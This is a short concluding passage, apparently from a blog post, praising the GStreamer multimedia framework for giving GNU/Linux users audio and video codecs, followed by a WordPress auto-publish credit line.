Bottom line

In conclusion, GStreamer is a very powerful and highly appreciated multimedia framework for the open source ecosystem, providing GNU/Linux users with a wide range of audio and video codecs for media playback and processing.

Source

WP2Social Auto Publish Powered By : XYZScripts.com